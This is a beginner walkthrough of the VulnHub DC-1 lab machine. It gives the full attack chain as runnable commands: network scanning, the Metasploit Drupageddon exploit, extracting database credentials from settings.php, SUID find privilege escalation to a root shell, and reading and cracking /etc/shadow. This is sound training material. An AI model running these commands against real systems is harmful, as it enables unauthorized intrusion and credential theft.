DC-1 VulnHub Walkthrough: Complete Beginner’s Guide

Introduction

Welcome to my complete walkthrough of DC-1 from VulnHub! If you’re new to penetration testing or CTF challenges, this guide is perfect for you. I’ll explain every step in detail so you can follow along and learn.

What is DC-1?
DC-1 is a purposely vulnerable machine designed to practice hacking skills in a safe, legal environment. It’s like a digital playground for security enthusiasts!

Difficulty Level: Beginner-Friendly
Skills You’ll Learn: Web hacking, database access, privilege escalation
Tools Needed: Kali Linux or any Linux distribution

Step 1: Finding the Target Machine

First, we need to discover the IP address of our target machine on the network.

Open your terminal and run:

nmap -sn 192.168.1.0/24

What this command does:

• nmap is a network scanning tool
• -sn means “ping scan” — it just finds which devices are online
• 192.168.1.0/24 scans all IP addresses from 192.168.1.1 to 192.168.1.254

What to look for:
You’ll see a list of devices on your network. Look for one that doesn’t look like your normal devices (computer, phone, etc.). In my case, the target was at 192.168.1.105.

Step 2: Detailed Service Scanning

Now that we found the target, let’s see what services it’s running:

nmap -sV -A 192.168.1.105

What this command does:

• -sV detects service versions
• -A enables aggressive scanning (OS detection, version detection, script scanning)

Expected Results:

PORT STATE SERVICE VERSION

80/tcp open http Apache httpd 2.2.22

|_http-title: Drupal 7

|_http-generator: Drupal 7 (http://drupal.org)

What this tells us:

• The machine is running a website (port 80)
• It’s using Drupal 7 content management system
• Apache web server version 2.2.22

Step 3: Exploring the Website

Open your web browser and visit:
http://192.168.1.105

You’ll see a default Drupal website. This is our entry point!

What is Drupal?
Drupal is a popular content management system (like WordPress) used to build websites. Older versions often have security vulnerabilities.

Step 4: Finding Vulnerabilities

Let’s check if this Drupal version has known vulnerabilities:

searchsploit drupal 7

What is searchsploit?
It’s a database of known exploits that comes with Kali Linux.

What we find:
There’s a famous vulnerability called “Drupageddon” (CVE-2014–3704) that affects Drupal versions 7.0 to 7.31.

Step 5: Getting Our First Access

We’ll use Metasploit, a powerful penetration testing framework:

Start Metasploit:
msfconsole

Use the Drupal exploit:
use exploit/unix/webapp/drupal_drupageddon

Set the target:
set RHOSTS 192.168.1.105

Run the exploit:
exploit

SUCCESS! You should now see a meterpreter shell. This means we have access to the target machine!

Step 6: Exploring the System

Let’s see what user we are and look around:

Check who we are:
whoami

You should see www-data — this is the web server user.

List files in current directory:
ls

You should see flag1.txt — let’s read it!

cat flag1.txt

Flag 1 Content

“Every good CMS needs a config file — and so do you.”

This hint tells us to look for configuration files.

Step 7: Finding Database Credentials

Let’s follow the hint and look for Drupal’s configuration file:

cat sites/default/settings.php

Look for these lines in the file:

php

$databases = array (

‘default’ =>

array (

‘default’ =>

array (

‘database’ => ‘drupaldb’,

‘username’ => ‘dbuser’,

‘password’ => ‘R0ck3t’,

We found gold! Database credentials:

• Database: drupaldb
• Username: dbuser
• Password: R0ck3t

Step 8: Accessing the Database

Now let’s use these credentials to access the MySQL database:

mysql -u dbuser -pR0ck3t -D drupaldb

What this command does:

• mysql — database client
• -u dbuser — username is dbuser
• -pR0ck3t — password is R0ck3t
• -D drupaldb — use the drupaldb database

Now we’re inside the database! Let’s explore.

Show all tables:
SHOW TABLES;

Look at users:
SELECT * FROM users;

Look at content:
SELECT * FROM node;

Look at the actual content bodies:
SELECT * FROM field_data_body;

Step 9: Finding More Flags

In the database, we find important information:

Flag 2:

text:

Brute force and dictionary attacks aren’t the

only ways to gain access (and you WILL need access).

What can you do with these credentials?

Flag 3 (Most Important):

text

“Special PERMS will help FIND the passwd — but you’ll need to -exec

that command to work out how to get what’s in the shadow.”

This is a huge hint about privilege escalation!

Exit the database:
exit

Step 10: Privilege Escalation

The hint mentions “Special PERMS” and “FIND” — this means we need to look for special permissions on the find command.

Let’s search for programs with special permissions:

find / -perm -u=s -type f 2>/dev/null

What this command does:

• find / — search from root directory
• -perm -u=s — find files with SUID permission
• -type f — only look for files
• 2>/dev/null — hide error messages

Key Finding: /usr/bin/find has SUID permission!

What is SUID?
SUID (Set User ID) is a special permission that allows a program to run with the permissions of the file owner (usually root) rather than the user running it.

Step 11: Exploiting SUID find

Since find has SUID and runs as root, we can use it to get a root shell:

find . -exec /bin/sh \; -quit

What this command does:

• find . — search in current directory
• -exec /bin/sh \; — execute /bin/sh (shell) for each file found
• -quit — stop after first match

SUCCESS! You should now see # instead of $ — this means you are root!

Verify you are root:
whoami

You should see root — congratulations!

Step 12: Finding All Flags

Now as root, we can find all the remaining flags:

Flag 4:
cat /home/flag4/flag4.txt

Content:

text:

“Can you use this same method to find or access the flag in root?

Probably. But perhaps it’s not that easy. Or maybe it is?”

Flag 5 (The Final Flag):
cat /root/thefinalflag.txt

Content:

text:

“Well done!!!!

Hopefully you’ve enjoyed this and learned some new skills.

You can let me know what you thought of this little journey

by contacting me via Twitter — @DCAU7”

Step 13: Bonus — Password Cracking

As root, we can also read the password hashes:

View the shadow file:
cat /etc/shadow

Copy the password hashes to your Kali machine and use John the Ripper to crack them:

On your Kali machine:
john hashes.txt

You’ll find that user flag4 has password orange!

What We Learned

Security Lessons:

1. Keep Software Updated — Drupal 7 had a known vulnerability
2. Protect Configuration Files — Database credentials were exposed
3. Manage File Permissions — SUID on find was unnecessary
4. Defense in Depth — Multiple security layers are needed

Technical Skills:

• Network scanning with nmap
• Vulnerability research with searchsploit
• Exploitation with Metasploit
• Database access and exploration
• Linux privilege escalation
• Password hash cracking

The Attack Chain:

1. Find target → 2. Discover services → 3. Find vulnerability → 4. Get initial access → 5. Find credentials → 6. Access database → 7. Get hints → 8. Privilege escalation → 9. Get root → 10. Find all flags

Conclusion

DC-1 is an excellent machine for beginners to learn penetration testing. It follows a logical path and teaches fundamental concepts that apply to real-world security assessments.

Remember: Always practice these skills in legal, authorized environments like VulnHub machines, HackTheBox, or your own lab.

Happy learning and stay ethical!

Note: All commands shown are for educational purposes in controlled environments. Always have proper authorization before testing any system.